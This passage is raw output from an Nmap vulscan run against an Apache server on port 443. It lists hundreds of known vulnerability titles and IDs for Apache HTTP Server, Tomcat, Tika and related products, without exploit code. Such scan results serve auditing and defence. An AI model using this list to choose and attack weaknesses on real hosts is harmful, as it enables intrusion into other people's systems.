8913| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
8914| [4231] Apache Cocoon Error Page Server Path Disclosure
8915| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
8916| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
8917| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
8918| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
8919| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
8920| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
8921| [3322] mod_php for Apache HTTP Server Process Hijack
8922| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
8923| [2885] Apache mod_python Malformed Query String DoS
8924| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
8925| [2733] Apache HTTP Server mod_rewrite Local Overflow
8926| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
8927| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
8928| [2149] Apache::Gallery Privilege Escalation
8929| [2107] Apache HTTP Server mod_ssl Host: Header XSS
8930| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
8931| [1833] Apache HTTP Server Multiple Slash GET Request DoS
8932| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
8933| [872] Apache Tomcat Multiple Default Accounts
8934| [862] Apache HTTP Server SSI Error Page XSS
8935| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
8936| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
8937| [845] Apache Tomcat MSDOS Device XSS
8938| [844] Apache Tomcat Java Servlet Error Page XSS
8939| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
8940| [838] Apache HTTP Server Chunked Encoding Remote Overflow
8941| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
8942| [775] Apache mod_python Module Importing Privilege Function Execution
8943| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
8944| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
8945| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
8946| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
8947| [637] Apache HTTP Server UserDir Directive Username Enumeration
8948| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
8949| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
8950| [562] Apache HTTP Server mod_info /server-info Information Disclosure
8951| [561] Apache Web Servers mod_status /server-status Information Disclosure
8952| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
8953| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
8954| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
8955| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
8956| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
8957| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
8958| [376] Apache Tomcat contextAdmin Arbitrary File Access
8959| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
8960| [222] Apache HTTP Server test-cgi Arbitrary File Access
8961| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
8962| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
8963|_
8964443/tcp open ssl/http Apache httpd (PleskLin)
8965|_http-server-header: Apache
8966| vulscan: VulDB - https://vuldb.com:
8967| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
8968| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
8969| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
8970| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
8971| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
8972| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
8973| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
8974| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
8975| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
8976| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
8977| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
8978| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
8979| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
8980| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
8981| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
8982| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
8983| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
8984| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
8985| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
8986| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
8987| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
8988| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
8989| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
8990| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
8991| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
8992| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
8993| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
8994| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
8995| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
8996| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
8997| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
8998| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
8999| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
9000| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
9001| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
9002| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
9003| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
9004| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
9005| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
9006| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
9007| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
9008| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
9009| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
9010| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
9011| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
9012| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
9013| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
9014| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
9015| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
9016| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
9017| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
9018| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
9019| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
9020| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
9021| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
9022| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
9023| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
9024| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
9025| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
9026| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
9027| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
9028| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
9029| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
9030| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
9031| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
9032| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
9033| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
9034| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
9035| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
9036| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
9037| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
9038| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
9039| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
9040| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
9041| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
9042| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
9043| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
9044| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
9045| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
9046| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
9047| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
9048| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
9049| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
9050| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
9051| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
9052| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
9053| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
9054| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
9055| [136370] Apache Fineract up to 1.2.x sql injection
9056| [136369] Apache Fineract up to 1.2.x sql injection
9057| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
9058| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
9059| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
9060| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
9061| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
9062| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
9063| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
9064| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
9065| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
9066| [134416] Apache Sanselan 0.97-incubator Loop denial of service
9067| [134415] Apache Sanselan 0.97-incubator Hang denial of service
9068| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
9069| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
9070| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
9071| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
9072| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
9073| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
9074| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
9075| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
9076| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
9077| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
9078| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
9079| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
9080| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
9081| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
9082| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
9083| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
9084| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
9085| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
9086| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
9087| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
9088| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
9089| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
9090| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
9091| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
9092| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
9093| [131859] Apache Hadoop up to 2.9.1 privilege escalation
9094| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
9095| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
9096| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
9097| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
9098| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
9099| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
9100| [130629] Apache Guacamole Cookie Flag weak encryption
9101| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
9102| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
9103| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
9104| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
9105| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
9106| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
9107| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
9108| [130123] Apache Airflow up to 1.8.2 information disclosure
9109| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
9110| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
9111| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
9112| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
9113| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
9114| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
9115| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
9116| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
9117| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
9118| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
9119| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
9120| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
9121| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
9122| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
9123| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
9124| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
9125| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
9126| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
9127| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
9128| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
9129| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
9130| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
9131| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
9132| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
9133| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
9134| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
9135| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
9136| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
9137| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
9138| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
9139| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
9140| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
9141| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
9142| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
9143| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
9144| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
9145| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
9146| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
9147| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
9148| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
9149| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
9150| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
9151| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
9152| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
9153| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
9154| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
9155| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
9156| [127007] Apache Spark Request Code Execution
9157| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
9158| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
9159| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
9160| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
9161| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
9162| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
9163| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
9164| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
9165| [126346] Apache Tomcat Path privilege escalation
9166| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
9167| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
9168| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
9169| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
9170| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
9171| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
9172| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
9173| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
9174| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
9175| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
9176| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
9177| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
9178| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
9179| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
9180| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
9181| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
9182| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
9183| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
9184| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
9185| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
9186| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
9187| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
9188| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
9189| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
9190| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
9191| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
9192| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
9193| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
9194| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
9195| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
9196| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
9197| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
9198| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
9199| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
9200| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
9201| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
9202| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
9203| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
9204| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
9205| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
9206| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
9207| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
9208| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
9209| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
9210| [123197] Apache Sentry up to 2.0.0 privilege escalation
9211| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
9212| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
9213| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
9214| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
9215| [122800] Apache Spark 1.3.0 REST API weak authentication
9216| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
9217| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
9218| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
9219| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
9220| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
9221| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
9222| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
9223| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
9224| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
9225| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
9226| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
9227| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
9228| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
9229| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
9230| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
9231| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
9232| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
9233| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
9234| [121354] Apache CouchDB HTTP API Code Execution
9235| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
9236| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
9237| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
9238| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
9239| [120168] Apache CXF weak authentication
9240| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
9241| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
9242| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
9243| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
9244| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
9245| [119306] Apache MXNet Network Interface privilege escalation
9246| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
9247| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
9248| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
9249| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
9250| [118143] Apache NiFi activemq-client Library Deserialization denial of service
9251| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
9252| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
9253| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
9254| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
9255| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
9256| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
9257| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
9258| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
9259| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
9260| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
9261| [117115] Apache Tika up to 1.17 tika-server command injection
9262| [116929] Apache Fineract getReportType Parameter privilege escalation
